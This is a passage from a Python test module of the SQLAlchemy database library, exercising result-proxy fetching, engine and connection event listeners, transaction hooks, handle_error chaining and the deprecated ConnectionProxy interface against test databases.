    ``get_result_proxy`` returns the variant under test."""

    __requires__ = ('sqlite', )

    @classmethod
    def setup_class(cls):
        # NOTE: removed a dead function-local ``from sqlalchemy.engine
        # import base, default`` here -- neither name was used inside
        # this method, and a function-local import cannot supply the
        # module-level ``default`` that _test_proxy relies on.
        cls.engine = engine = testing_engine('sqlite://')
        m = MetaData()
        cls.table = t = Table('test', m,
            Column('x', Integer, primary_key=True),
            Column('y', String(50, convert_unicode='force'))
        )
        m.create_all(engine)
        # seed rows (1, 't_1') .. (11, 't_11')
        engine.execute(t.insert(), [
            {'x': i, 'y': "t_%d" % i} for i in range(1, 12)
        ])

    def _test_proxy(self, cls):
        """Install ``cls`` as the result proxy and exercise the fetch API."""
        class ExcCtx(default.DefaultExecutionContext):
            def get_result_proxy(self):
                return cls(self)
        self.engine.dialect.execution_ctx_cls = ExcCtx
        rows = []
        r = self.engine.execute(select([self.table]))
        assert isinstance(r, cls)
        for i in range(5):
            rows.append(r.fetchone())
        eq_(rows, [(i, "t_%d" % i) for i in range(1, 6)])

        rows = r.fetchmany(3)
        eq_(rows, [(i, "t_%d" % i) for i in range(6, 9)])

        rows = r.fetchall()
        eq_(rows, [(i, "t_%d" % i) for i in range(9, 12)])

        r = self.engine.execute(select([self.table]))
        rows = r.fetchmany(None)
        eq_(rows[0], (1, "t_1"))
        # fetchmany(None) behavior varies per proxy: one row, or all rows
        assert len(rows) == 1 or len(rows) == 11

        # exhausting a LIMITed result returns None afterwards
        r = self.engine.execute(select([self.table]).limit(1))
        r.fetchone()
        eq_(r.fetchone(), None)

        # fetchmany() larger than the remaining rows truncates cleanly
        r = self.engine.execute(select([self.table]).limit(5))
        rows = r.fetchmany(6)
        eq_(rows, [(i, "t_%d" % i) for i in range(1, 6)])

    def test_plain(self):
        self._test_proxy(_result.ResultProxy)

    def test_buffered_row_result_proxy(self):
        self._test_proxy(_result.BufferedRowResultProxy)

    def test_fully_buffered_result_proxy(self):
        self._test_proxy(_result.FullyBufferedResultProxy)

    def test_buffered_column_result_proxy(self):
        self._test_proxy(_result.BufferedColumnResultProxy)

class EngineEventsTest(fixtures.TestBase):
    """Tests for engine/connection-level events: before/after_execute,
    before/after_cursor_execute, transactional hooks, execution-option
    events, and listener scoping (per-engine, per-connection, and
    global listeners on the Engine class)."""

    __requires__ = 'ad_hoc_engines',
    __backend__ = True

    def tearDown(self):
        # remove any listeners installed on the Engine class itself so
        # tests don't leak global event state into each other
        Engine.dispatch._clear()
        Engine._has_events = False

    def _assert_stmts(self, expected, received):
        """Assert each (stmt, params, posn) tuple in ``expected`` is
        matched, in order, by some entry of ``received``; entries of
        ``received`` that don't match are consumed and skipped."""
        orig = list(received)
        for stmt, params, posn in expected:
            if not received:
                assert False, "Nothing available for stmt: %s" % stmt
            while received:
                teststmt, testparams, testmultiparams = \
                    received.pop(0)
                # collapse whitespace before prefix-comparing statements
                teststmt = re.compile(r'[\n\t ]+', re.M).sub(' ',
                        teststmt).strip()
                if teststmt.startswith(stmt) and (testparams
                        == params or testparams == posn):
                    break

    def test_per_engine_independence(self):
        """A listener on one engine does not fire for another engine."""
        e1 = testing_engine(config.db_url)
        e2 = testing_engine(config.db_url)

        canary = Mock()
        event.listen(e1, "before_execute", canary)
        s1 = select([1])
        s2 = select([2])
        e1.execute(s1)
        e2.execute(s2)
        # only e1's execution was observed
        eq_(
            [arg[1][1] for arg in canary.mock_calls], [s1]
        )
        event.listen(e2, "before_execute", canary)
        e1.execute(s1)
        e2.execute(s2)
        eq_([arg[1][1] for arg in canary.mock_calls], [s1, s1, s2])


    def test_per_engine_plus_global(self):
        """Listeners on the Engine class fire for all engines; listeners
        on an individual engine fire only for that engine."""
        canary = Mock()
        event.listen(Engine, "before_execute", canary.be1)
        e1 = testing_engine(config.db_url)
        e2 = testing_engine(config.db_url)

        event.listen(e1, "before_execute", canary.be2)

        event.listen(Engine, "before_execute", canary.be3)
        e1.connect()
        e2.connect()

        e1.execute(select([1]))
        eq_(canary.be1.call_count, 1)
        eq_(canary.be2.call_count, 1)

        e2.execute(select([1]))

        # global listeners saw both executions; e1-only listener saw one
        eq_(canary.be1.call_count, 2)
        eq_(canary.be2.call_count, 1)
        eq_(canary.be3.call_count, 2)

    def test_per_connection_plus_engine(self):
        """Connection-level listeners fire alongside engine-level ones,
        including on branched connections."""
        canary = Mock()
        e1 = testing_engine(config.db_url)

        event.listen(e1, "before_execute", canary.be1)

        conn = e1.connect()
        event.listen(conn, "before_execute", canary.be2)
        conn.execute(select([1]))

        eq_(canary.be1.call_count, 1)
        eq_(canary.be2.call_count, 1)

        # a branch of the connection inherits its listeners
        conn._branch().execute(select([1]))
        eq_(canary.be1.call_count, 2)
        eq_(canary.be2.call_count, 2)

    def test_add_event_after_connect(self):
        """A listener added to an engine after a connection was made is
        still picked up by that connection (new feature as of #2978)."""
        canary = Mock()
        e1 = create_engine(config.db_url)
        assert not e1._has_events

        conn = e1.connect()

        event.listen(e1, "before_execute", canary.be1)
        conn.execute(select([1]))

        eq_(canary.be1.call_count, 1)

        conn._branch().execute(select([1]))
        eq_(canary.be1.call_count, 2)

    def test_force_conn_events_false(self):
        """Constructing a connection with _has_events=False suppresses
        engine-level listeners on that connection and its branches."""
        canary = Mock()
        e1 = create_engine(config.db_url)
        assert not e1._has_events

        event.listen(e1, "before_execute", canary.be1)

        conn = e1._connection_cls(e1, connection=e1.raw_connection(),
                            _has_events=False)

        conn.execute(select([1]))

        eq_(canary.be1.call_count, 0)

        conn._branch().execute(select([1]))
        eq_(canary.be1.call_count, 0)

    def test_cursor_events_ctx_execute_scalar(self):
        """before/after_cursor_execute fire for the internal
        _execute_scalar() path on an execution context."""
        canary = Mock()
        e1 = testing_engine(config.db_url)

        event.listen(e1, "before_cursor_execute", canary.bce)
        event.listen(e1, "after_cursor_execute", canary.ace)

        stmt = str(select([1]).compile(dialect=e1.dialect))

        with e1.connect() as conn:
            dialect = conn.dialect

            ctx = dialect.execution_ctx_cls._init_statement(
                            dialect, conn, conn.connection, stmt, {})

            ctx._execute_scalar(stmt, Integer())

        eq_(canary.bce.mock_calls,
                [call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)])
        eq_(canary.ace.mock_calls,
                [call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)])

    def test_cursor_events_execute(self):
        """before/after_cursor_execute fire for a plain string execute,
        receiving the cursor, statement, parameters and context."""
        canary = Mock()
        e1 = testing_engine(config.db_url)

        event.listen(e1, "before_cursor_execute", canary.bce)
        event.listen(e1, "after_cursor_execute", canary.ace)

        stmt = str(select([1]).compile(dialect=e1.dialect))

        with e1.connect() as conn:

            result = conn.execute(stmt)

        ctx = result.context
        eq_(canary.bce.mock_calls,
                [call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)])
        eq_(canary.ace.mock_calls,
                [call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)])


    def test_argument_format_execute(self):
        """before/after_execute always receive multiparams as a
        list/tuple and params as a dict, across all execute paths."""
        def before_execute(conn, clauseelement, multiparams, params):
            assert isinstance(multiparams, (list, tuple))
            assert isinstance(params, dict)
        def after_execute(conn, clauseelement, multiparams, params, result):
            assert isinstance(multiparams, (list, tuple))
            assert isinstance(params, dict)
        e1 = testing_engine(config.db_url)
        event.listen(e1, 'before_execute', before_execute)
        event.listen(e1, 'after_execute', after_execute)

        e1.execute(select([1]))
        e1.execute(select([1]).compile(dialect=e1.dialect).statement)
        e1.execute(select([1]).compile(dialect=e1.dialect))
        e1._execute_compiled(select([1]).compile(dialect=e1.dialect), (), {})




    @testing.fails_on('firebird', 'Data type unknown')
    def test_execute_events(self):
        """Record before_execute / before_cursor_execute invocations
        across a DDL + DML round trip and compare against the expected
        statement sequences, for plain, threadlocal and connection-level
        targets."""

        stmts = []
        cursor_stmts = []

        def execute(conn, clauseelement, multiparams,
                                                    params ):
            stmts.append((str(clauseelement), params, multiparams))

        def cursor_execute(conn, cursor, statement, parameters,
                                context, executemany):
            cursor_stmts.append((str(statement), parameters, None))


        for engine in [
            engines.testing_engine(options=dict(implicit_returning=False)),
            engines.testing_engine(options=dict(implicit_returning=False,
                                   strategy='threadlocal')),
            engines.testing_engine(options=dict(implicit_returning=False)).\
                connect()
            ]:
            event.listen(engine, 'before_execute', execute)
            event.listen(engine, 'before_cursor_execute', cursor_execute)
            m = MetaData(engine)
            t1 = Table('t1', m,
                Column('c1', Integer, primary_key=True),
                Column('c2', String(50), default=func.lower('Foo'),
                                            primary_key=True)
            )
            m.create_all()
            try:
                t1.insert().execute(c1=5, c2='some data')
                t1.insert().execute(c1=6)
                eq_(engine.execute('select * from t1').fetchall(), [(5,
                    'some data'), (6, 'foo')])
            finally:
                m.drop_all()

            compiled = [('CREATE TABLE t1', {}, None),
                        ('INSERT INTO t1 (c1, c2)',
                                {'c2': 'some data', 'c1': 5}, None),
                        ('INSERT INTO t1 (c1, c2)',
                        {'c1': 6}, None),
                        ('select * from t1', {}, None),
                        ('DROP TABLE t1', {}, None)]

            # or engine.dialect.preexecute_pk_sequences:
            if not testing.against('oracle+zxjdbc'):
                cursor = [
                    ('CREATE TABLE t1', {}, ()),
                    ('INSERT INTO t1 (c1, c2)', {
                        'c2': 'some data', 'c1': 5},
                        (5, 'some data')),
                    ('SELECT lower', {'lower_2': 'Foo'},
                        ('Foo', )),
                    ('INSERT INTO t1 (c1, c2)',
                     {'c2': 'foo', 'c1': 6},
                     (6, 'foo')),
                    ('select * from t1', {}, ()),
                    ('DROP TABLE t1', {}, ()),
                    ]
            else:
                insert2_params = 6, 'Foo'
                if testing.against('oracle+zxjdbc'):
                    insert2_params += (ReturningParam(12), )
                cursor = [('CREATE TABLE t1', {}, ()),
                          ('INSERT INTO t1 (c1, c2)',
                            {'c2': 'some data', 'c1': 5}, (5, 'some data')),
                          ('INSERT INTO t1 (c1, c2)', {'c1': 6,
                          'lower_2': 'Foo'}, insert2_params),
                          ('select * from t1', {}, ()),
                          ('DROP TABLE t1', {}, ())]
                                # bind param name 'lower_2' might
                                # be incorrect
            self._assert_stmts(compiled, stmts)
            self._assert_stmts(cursor, cursor_stmts)

    def test_options(self):
        """Listeners registered on an engine are carried through
        execution_options() derivations of its connections."""
        canary = []

        def execute(conn, *args, **kw):
            canary.append('execute')

        def cursor_execute(conn, *args, **kw):
            canary.append('cursor_execute')

        engine = engines.testing_engine()
        event.listen(engine, 'before_execute', execute)
        event.listen(engine, 'before_cursor_execute', cursor_execute)
        conn = engine.connect()
        c2 = conn.execution_options(foo='bar')
        eq_(c2._execution_options, {'foo':'bar'})
        c2.execute(select([1]))
        c3 = c2.execution_options(bar='bat')
        eq_(c3._execution_options, {'foo':'bar', 'bar':'bat'})
        eq_(canary, ['execute', 'cursor_execute'])

    def test_retval_flag(self):
        """retval=True is accepted for before_execute and
        before_cursor_execute but rejected for other events (begin)."""
        canary = []
        def tracker(name):
            def go(conn, *args, **kw):
                canary.append(name)
            return go

        def execute(conn, clauseelement, multiparams, params):
            canary.append('execute')
            return clauseelement, multiparams, params

        def cursor_execute(conn, cursor, statement,
                        parameters, context, executemany):
            canary.append('cursor_execute')
            return statement, parameters

        engine = engines.testing_engine()

        assert_raises(
            tsa.exc.ArgumentError,
            event.listen, engine, "begin", tracker("begin"), retval=True
        )

        event.listen(engine, "before_execute", execute, retval=True)
        event.listen(engine, "before_cursor_execute", cursor_execute, retval=True)
        engine.execute(select([1]))
        eq_(
            canary, ['execute', 'cursor_execute']
        )

    def test_engine_connect(self):
        """engine_connect fires with (connection, branch_flag): False for
        a direct connect, True for a branch."""
        engine = engines.testing_engine()

        tracker = Mock()
        event.listen(engine, "engine_connect", tracker)

        c1 = engine.connect()
        c2 = c1._branch()
        c1.close()
        eq_(
            tracker.mock_calls,
            [call(c1, False), call(c2, True)]
        )

    def test_execution_options(self):
        """set_engine_execution_options / set_connection_execution_options
        events fire once per derivation with the new options dict."""
        engine = engines.testing_engine()

        engine_tracker = Mock()
        conn_tracker = Mock()

        event.listen(engine, "set_engine_execution_options", engine_tracker)
        event.listen(engine, "set_connection_execution_options", conn_tracker)

        e2 = engine.execution_options(e1='opt_e1')
        c1 = engine.connect()
        c2 = c1.execution_options(c1='opt_c1')
        c3 = e2.connect()
        c4 = c3.execution_options(c3='opt_c3')
        eq_(
            engine_tracker.mock_calls,
            [call(e2, {'e1': 'opt_e1'})]
        )
        eq_(
            conn_tracker.mock_calls,
            [call(c2, {"c1": "opt_c1"}), call(c4, {"c3": "opt_c3"})]
        )


    @testing.requires.sequences
    @testing.provide_metadata
    def test_cursor_execute(self):
        """An INSERT against a sequence-backed PK produces two cursor
        executions (sequence fetch, then INSERT) sharing one context."""
        canary = []
        def tracker(name):
            def go(conn, cursor, statement, parameters, context, executemany):
                canary.append((statement, context))
            return go
        engine = engines.testing_engine()


        t = Table('t', self.metadata,
                    Column('x', Integer, Sequence('t_id_seq'), primary_key=True),
                    implicit_returning=False
                    )
        self.metadata.create_all(engine)
        with engine.begin() as conn:
            event.listen(conn, 'before_cursor_execute', tracker('cursor_execute'))
            conn.execute(t.insert())
        # we see the sequence pre-executed in the first call
        assert "t_id_seq" in canary[0][0]
        assert "INSERT" in canary[1][0]
        # same context
        is_(
            canary[0][1], canary[1][1]
        )

    def test_transactional(self):
        """begin/commit/rollback events interleave with execute events
        in the expected order."""
        canary = []
        def tracker(name):
            def go(conn, *args, **kw):
                canary.append(name)
            return go

        engine = engines.testing_engine()
        event.listen(engine, 'before_execute', tracker('execute'))
        event.listen(engine, 'before_cursor_execute', tracker('cursor_execute'))
        event.listen(engine, 'begin', tracker('begin'))
        event.listen(engine, 'commit', tracker('commit'))
        event.listen(engine, 'rollback', tracker('rollback'))

        conn = engine.connect()
        trans = conn.begin()
        conn.execute(select([1]))
        trans.rollback()
        trans = conn.begin()
        conn.execute(select([1]))
        trans.commit()

        eq_(canary, [
            'begin', 'execute', 'cursor_execute', 'rollback',
            'begin', 'execute', 'cursor_execute', 'commit',
            ])

    @testing.requires.savepoints
    @testing.requires.two_phase_transactions
    def test_transactional_advanced(self):
        """Savepoint and two-phase events fire identically whether
        listened on the engine (canary1) or the connection (canary2)."""
        canary1 = []
        def tracker1(name):
            def go(*args, **kw):
                canary1.append(name)
            return go
        canary2 = []
        def tracker2(name):
            def go(*args, **kw):
                canary2.append(name)
            return go

        engine = engines.testing_engine()
        for name in ['begin', 'savepoint',
                    'rollback_savepoint', 'release_savepoint',
                    'rollback', 'begin_twophase',
                       'prepare_twophase', 'commit_twophase']:
            event.listen(engine, '%s' % name, tracker1(name))

        conn = engine.connect()
        for name in ['begin', 'savepoint',
                    'rollback_savepoint', 'release_savepoint',
                    'rollback', 'begin_twophase',
                       'prepare_twophase', 'commit_twophase']:
            event.listen(conn, '%s' % name, tracker2(name))

        trans = conn.begin()
        trans2 = conn.begin_nested()
        conn.execute(select([1]))
        trans2.rollback()
        trans2 = conn.begin_nested()
        conn.execute(select([1]))
        trans2.commit()
        trans.rollback()

        trans = conn.begin_twophase()
        conn.execute(select([1]))
        trans.prepare()
        trans.commit()

        eq_(canary1, ['begin', 'savepoint',
                    'rollback_savepoint', 'savepoint', 'release_savepoint',
                    'rollback', 'begin_twophase',
                       'prepare_twophase', 'commit_twophase']
        )
        eq_(canary2, ['begin', 'savepoint',
                    'rollback_savepoint', 'savepoint', 'release_savepoint',
                    'rollback', 'begin_twophase',
                       'prepare_twophase', 'commit_twophase']
        )

class HandleErrorTest(fixtures.TestBase):
    """Tests for the handle_error event and its legacy predecessor
    dbapi_error: context contents, exception re-raise/replacement,
    listener chaining, and is_disconnect mutation."""

    __requires__ = 'ad_hoc_engines',
    __backend__ = True

    def tearDown(self):
        # clear class-level Engine listeners installed by tests
        Engine.dispatch._clear()
        Engine._has_events = False

    def test_legacy_dbapi_error(self):
        """dbapi_error receives the original DBAPI exception and the
        failing statement as positional arguments."""
        engine = engines.testing_engine()
        canary = Mock()

        event.listen(engine, "dbapi_error", canary)

        with engine.connect() as conn:
            try:
                conn.execute("SELECT FOO FROM I_DONT_EXIST")
                assert False
            except tsa.exc.DBAPIError as e:
                eq_(canary.mock_calls[0][1][5], e.orig)
                eq_(canary.mock_calls[0][1][2], "SELECT FOO FROM I_DONT_EXIST")

    def test_legacy_dbapi_error_no_ad_hoc_context(self):
        """A pre-execute failure (bind processing) does not invoke the
        legacy dbapi_error event."""
        engine = engines.testing_engine()

        listener = Mock(return_value=None)
        event.listen(engine, 'dbapi_error', listener)

        nope = Exception("nope")
        class MyType(TypeDecorator):
            impl = Integer
            def process_bind_param(self, value, dialect):
                # raising here fails the statement before the cursor runs
                raise nope

        with engine.connect() as conn:
            assert_raises_message(
                tsa.exc.StatementError,
                r"nope \(original cause: Exception: nope\) u?'SELECT 1 ",
                conn.execute,
                    select([1]).where(
                            column('foo') == literal('bar', MyType()))
            )
        # no legacy event
        eq_(listener.mock_calls, [])

    def test_legacy_dbapi_error_non_dbapi_error(self):
        """A non-DBAPI exception raised by the cursor does not invoke
        the legacy dbapi_error event."""
        engine = engines.testing_engine()

        listener = Mock(return_value=None)
        event.listen(engine, 'dbapi_error', listener)

        nope = TypeError("I'm not a DBAPI error")
        with engine.connect() as c:
            # make cursor.execute() raise a plain TypeError
            c.connection.cursor = Mock(
                    return_value=Mock(
                        execute=Mock(
                                side_effect=nope
                        ))
                    )

            assert_raises_message(
                TypeError,
                "I'm not a DBAPI error",
                c.execute, "select "
            )
        # no legacy event
        eq_(listener.mock_calls, [])


    def test_handle_error(self):
        """handle_error receives a context exposing the original
        exception, the wrapping SQLAlchemy exception, and the statement."""
        engine = engines.testing_engine()
        canary = Mock(return_value=None)

        event.listen(engine, "handle_error", canary)

        with engine.connect() as conn:
            try:
                conn.execute("SELECT FOO FROM I_DONT_EXIST")
                assert False
            except tsa.exc.DBAPIError as e:
                ctx = canary.mock_calls[0][1][0]

                eq_(ctx.original_exception, e.orig)
                is_(ctx.sqlalchemy_exception, e)
                eq_(ctx.statement, "SELECT FOO FROM I_DONT_EXIST")

    def test_exception_event_reraise(self):
        """A retval=True handle_error listener can replace the raised
        exception, return the DBAPI exception unwrapped, or decline."""
        engine = engines.testing_engine()

        class MyException(Exception):
            pass

        @event.listens_for(engine, 'handle_error', retval=True)
        def err(context):
            stmt = context.statement
            exception = context.original_exception
            if "ERROR ONE" in str(stmt):
                return MyException("my exception")
            elif "ERROR TWO" in str(stmt):
                return exception
            else:
                return None

        conn = engine.connect()
        # case 1: custom exception
        assert_raises_message(
            MyException,
            "my exception",
            conn.execute, "SELECT 'ERROR ONE' FROM I_DONT_EXIST"
        )
        # case 2: return the DBAPI exception we're given;
        # no wrapping should occur
        assert_raises(
            conn.dialect.dbapi.Error,
            conn.execute, "SELECT 'ERROR TWO' FROM I_DONT_EXIST"
        )
        # case 3: normal wrapping
        assert_raises(
            tsa.exc.DBAPIError,
            conn.execute, "SELECT 'ERROR THREE' FROM I_DONT_EXIST"
        )

    def test_exception_event_reraise_chaining(self):
        """Multiple retval=True listeners chain: each sees the prior
        listener's result via context.chained_exception, a listener may
        raise to short-circuit, and a non-None result survives a later
        listener returning None."""
        engine = engines.testing_engine()

        class MyException1(Exception):
            pass

        class MyException2(Exception):
            pass

        class MyException3(Exception):
            pass

        @event.listens_for(engine, 'handle_error', retval=True)
        def err1(context):
            stmt = context.statement

            if "ERROR ONE" in str(stmt) or "ERROR TWO" in str(stmt) \
                    or "ERROR THREE" in str(stmt):
                return MyException1("my exception")
            elif "ERROR FOUR" in str(stmt):
                raise MyException3("my exception short circuit")

        @event.listens_for(engine, 'handle_error', retval=True)
        def err2(context):
            stmt = context.statement
            if ("ERROR ONE" in str(stmt) or "ERROR FOUR" in str(stmt)) \
                    and isinstance(context.chained_exception, MyException1):
                raise MyException2("my exception chained")
            elif "ERROR TWO" in str(stmt):
                return context.chained_exception
            else:
                return None

        conn = engine.connect()

        # patching handle_dbapi_exception verifies it is entered exactly
        # once per failing execute (no recursive re-entry)
        with patch.object(engine.
                dialect.execution_ctx_cls,
                "handle_dbapi_exception") as patched:
            assert_raises_message(
                MyException2,
                "my exception chained",
                conn.execute, "SELECT 'ERROR ONE' FROM I_DONT_EXIST"
            )
            eq_(patched.call_count, 1)

        with patch.object(engine.
                dialect.execution_ctx_cls,
                "handle_dbapi_exception") as patched:
            assert_raises(
                MyException1,
                conn.execute, "SELECT 'ERROR TWO' FROM I_DONT_EXIST"
            )
            eq_(patched.call_count, 1)

        with patch.object(engine.
                dialect.execution_ctx_cls,
                "handle_dbapi_exception") as patched:
            # test that non None from err1 isn't cancelled out
            # by err2
            assert_raises(
                MyException1,
                conn.execute, "SELECT 'ERROR THREE' FROM I_DONT_EXIST"
            )
            eq_(patched.call_count, 1)

        with patch.object(engine.
                dialect.execution_ctx_cls,
                "handle_dbapi_exception") as patched:
            assert_raises(
                tsa.exc.DBAPIError,
                conn.execute, "SELECT 'ERROR FIVE' FROM I_DONT_EXIST"
            )
            eq_(patched.call_count, 1)

        with patch.object(engine.
                dialect.execution_ctx_cls,
                "handle_dbapi_exception") as patched:
            assert_raises_message(
                MyException3,
                "my exception short circuit",
                conn.execute, "SELECT 'ERROR FOUR' FROM I_DONT_EXIST"
            )
            eq_(patched.call_count, 1)

    def test_exception_event_ad_hoc_context(self):
        """test that handle_error is called with a context in
        cases where _handle_dbapi_error() is normally called without
        any context.

        """

        engine = engines.testing_engine()

        listener = Mock(return_value=None)
        event.listen(engine, 'handle_error', listener)

        nope = Exception("nope")
        class MyType(TypeDecorator):
            impl = Integer
            def process_bind_param(self, value, dialect):
                # fail during bind processing, before the cursor runs
                raise nope

        with engine.connect() as conn:
            assert_raises_message(
                tsa.exc.StatementError,
                r"nope \(original cause: Exception: nope\) u?'SELECT 1 ",
                conn.execute,
                    select([1]).where(
                            column('foo') == literal('bar', MyType()))
            )

        ctx = listener.mock_calls[0][1][0]
        assert ctx.statement.startswith("SELECT 1 ")
        is_(ctx.is_disconnect, False)
        is_(ctx.original_exception, nope)

    def test_exception_event_non_dbapi_error(self):
        """test that dbapi_error is called with a context in
        cases where DBAPI raises an exception that is not a DBAPI
        exception, e.g. internal errors or encoding problems.

        """
        engine = engines.testing_engine()

        listener = Mock(return_value=None)
        event.listen(engine, 'handle_error', listener)

        nope = TypeError("I'm not a DBAPI error")
        with engine.connect() as c:
            # make cursor.execute() raise a plain TypeError
            c.connection.cursor = Mock(
                    return_value=Mock(
                        execute=Mock(
                                side_effect=nope
                        ))
                    )

            assert_raises_message(
                TypeError,
                "I'm not a DBAPI error",
                c.execute, "select "
            )
        ctx = listener.mock_calls[0][1][0]
        eq_(ctx.statement, "select ")
        is_(ctx.is_disconnect, False)
        is_(ctx.original_exception, nope)

    def _test_alter_disconnect(self, orig_error, evt_value):
        """Force the dialect's is_disconnect() to ``orig_error`` and have
        a handle_error listener overwrite ctx.is_disconnect with
        ``evt_value``; the raised StatementError must reflect the
        listener's value."""
        engine = engines.testing_engine()

        @event.listens_for(engine, "handle_error")
        def evt(ctx):
            ctx.is_disconnect = evt_value

        with patch.object(engine.dialect, "is_disconnect",
                Mock(return_value=orig_error)):

            with engine.connect() as c:
                try:
                    c.execute("SELECT x FROM nonexistent")
                    assert False
                except tsa.exc.StatementError as st:
                    eq_(st.connection_invalidated, evt_value)

    def test_alter_disconnect_to_true(self):
        self._test_alter_disconnect(False, True)
        self._test_alter_disconnect(True, True)

    def test_alter_disconnect_to_false(self):
        self._test_alter_disconnect(True, False)
        self._test_alter_disconnect(False, False)

class ProxyConnectionTest(fixtures.TestBase):
    """These are the same tests as EngineEventsTest, except using
    the deprecated ConnectionProxy interface.

    """
    __requires__ = 'ad_hoc_engines',
    __prefer_requires__ = 'two_phase_transactions',

    @testing.uses_deprecated(r'.*Use event.listen')
    @testing.fails_on('firebird', 'Data type unknown')
    def test_proxy(self):
        """ConnectionProxy.execute / cursor_execute intercept a DDL + DML
        round trip; recorded statements are compared against expected
        sequences for both plain and threadlocal engines."""

        stmts = []
        cursor_stmts = []

        class MyProxy(ConnectionProxy):
            def execute(
                self,
                conn,
                execute,
                clauseelement,
                *multiparams,
                **params
                ):
                # record, then delegate to the real execute
                stmts.append((str(clauseelement), params, multiparams))
                return execute(clauseelement, *multiparams, **params)

            def cursor_execute(
                self,
                execute,
                cursor,
                statement,
                parameters,
                context,
                executemany,
                ):
                # record, then delegate to the real cursor execute
                cursor_stmts.append((str(statement), parameters, None))
                return execute(cursor, statement, parameters, context)

        def assert_stmts(expected, received):
            # same matching logic as EngineEventsTest._assert_stmts:
            # expected entries must appear in order; non-matching
            # received entries are consumed and skipped
            for stmt, params, posn in expected:
                if not received:
                    assert False, "Nothing available for stmt: %s" % stmt
                while received:
                    teststmt, testparams, testmultiparams = \
                        received.pop(0)
                    teststmt = re.compile(r'[\n\t ]+', re.M).sub(' ',
                            teststmt).strip()
                    if teststmt.startswith(stmt) and (testparams
                            == params or testparams == posn):
                        break

        for engine in \
            engines.testing_engine(options=dict(implicit_returning=False,
                                   proxy=MyProxy())), \
            engines.testing_engine(options=dict(implicit_returning=False,
                                   proxy=MyProxy(),
                                   strategy='threadlocal')):
            m = MetaData(engine)
            t1 = Table('t1', m,
                Column('c1', Integer, primary_key=True),
                Column('c2', String(50), default=func.lower('Foo'),
                                            primary_key=True)
            )
            m.create_all()
            try:
                t1.insert().execute(c1=5, c2='some data')
                t1.insert().execute(c1=6)
                eq_(engine.execute('select * from t1').fetchall(), [(5,
                    'some data'), (6, 'foo')])
            finally:
                m.drop_all()
            engine.dispose()
            compiled = [('CREATE TABLE t1', {}, None),
                        ('INSERT INTO t1 (c1, c2)', {'c2': 'some data',
                        'c1': 5}, None), ('INSERT INTO t1 (c1, c2)',
                        {'c1': 6}, None), ('select * from t1', {},
                        None), ('DROP TABLE t1', {}, None)]
            if not testing.against('oracle+zxjdbc'):  # or engine.dialect.pr
                                                      # eexecute_pk_sequence
                                                      # s:
                cursor = [
                    ('CREATE TABLE t1', {}, ()),
                    ('INSERT INTO t1 (c1, c2)', {'c2': 'some data', 'c1'
                     : 5}, (5, 'some data')),
                    ('SELECT lower', {'lower_2': 'Foo'},
                        ('Foo', )),
                    ('INSERT INTO t1 (c1, c2)', {'c2': 'foo', 'c1': 6},
                     (6, 'foo')),
                    ('select * from t1', {}, ()),
                    ('DROP TABLE t1', {}, ()),
                    ]
            else:
                insert2_params = 6, 'Foo'
                if testing.against('oracle+zxjdbc'):
                    insert2_params += (ReturningParam(12), )
                cursor = [('CREATE TABLE t1', {}, ()),
                          ('INSERT INTO t1 (c1, c2)', {'c2': 'some data'
                          , 'c1': 5}, (5, 'some data')),
                          ('INSERT INTO t1 (c1, c2)', {'c1': 6,
                          'lower_2': 'Foo'}, insert2_params),
                          ('select * from t1', {}, ()), ('DROP TABLE t1'
                          , {}, ())]  # bind param name 'lower_2' might
                                      # be incorrect
            assert_stmts(compiled, stmts)
            assert_stmts(cursor, cursor_stmts)

    @testing.uses_deprecated(r'.*Use event.listen')
    def test_options(self):
        """A proxy installed on the engine follows connections derived
        via execution_options()."""
        canary = []
        class TrackProxy(ConnectionProxy):
            def __getattribute__(self, key):
                # wrap every proxy method to record its name when called
                fn = object.__getattribute__(self, key)
                def go(*arg, **kw):
                    canary.append(fn.__name__)
                    return fn(*arg, **kw)
                return go
        engine = engines.testing_engine(options={'proxy':TrackProxy()})
        conn = engine.connect()
        c2 = conn.execution_options(foo='bar')
        eq_(c2._execution_options, {'foo':'bar'})
        c2.execute(select([1]))
        c3 = c2.execution_options(bar='bat')
        eq_(c3._execution_options, {'foo':'bar', 'bar':'bat'})
        eq_(canary, ['execute', 'cursor_execute'])


    @testing.uses_deprecated(r'.*Use event.listen')
    def test_transactional(self):
        """Proxy hooks fire for begin/commit/rollback interleaved with
        execute calls, in order."""
        canary = []
        class TrackProxy(ConnectionProxy):
            def __getattribute__(self, key):
                fn = object.__getattribute__(self, key)
                def go(*arg, **kw):
                    canary.append(fn.__name__)
                    return fn(*arg, **kw)
                return go

        engine = engines.testing_engine(options={'proxy':TrackProxy()})
        conn = engine.connect()
        trans = conn.begin()
        conn.execute(select([1]))
        trans.rollback()
        trans = conn.begin()
        conn.execute(select([1]))
        trans.commit()

        eq_(canary, [
            'begin', 'execute', 'cursor_execute', 'rollback',
            'begin', 'execute', 'cursor_execute', 'commit',
            ])

    @testing.uses_deprecated(r'.*Use event.listen')
    @testing.requires.savepoints
    @testing.requires.two_phase_transactions
    def test_transactional_advanced(self):
        """Proxy hooks fire for savepoint and two-phase operations;
        execute noise is filtered out before comparison."""
        canary = []
        class TrackProxy(ConnectionProxy):
            def __getattribute__(self, key):
                fn = object.__getattribute__(self, key)
                def go(*arg, **kw):
                    canary.append(fn.__name__)
                    return fn(*arg, **kw)
                return go

        engine = engines.testing_engine(options={'proxy':TrackProxy()})
        conn = engine.connect()

        trans = conn.begin()
        trans2 = conn.begin_nested()
        conn.execute(select([1]))
        trans2.rollback()
        trans2 = conn.begin_nested()
        conn.execute(select([1]))
        trans2.commit()
        trans.rollback()

        trans = conn.begin_twophase()
        conn.execute(select([1]))
        trans.prepare()
        trans.commit()

        # keep only the transactional hook names
        canary = [t for t in canary if t not in ('cursor_execute', 'execute')]
        eq_(canary, ['begin', 'savepoint',
                    'rollback_savepoint', 'savepoint', 'release_savepoint',
                    'rollback', 'begin_twophase',
                       'prepare_twophase', 'commit_twophase']
        )

class DialectEventTest(fixtures.TestBase):
    """Tests for the ``do_execute`` / ``do_executemany`` /
    ``do_execute_no_params`` dialect-level events, covering both the
    "replace" mode (listener returns a truthy value, bypassing the
    dialect) and the "observe" mode (listener returns None)."""

    @contextmanager
    def _run_test(self, retval):
        # ``retval`` is what the event listeners return: truthy means the
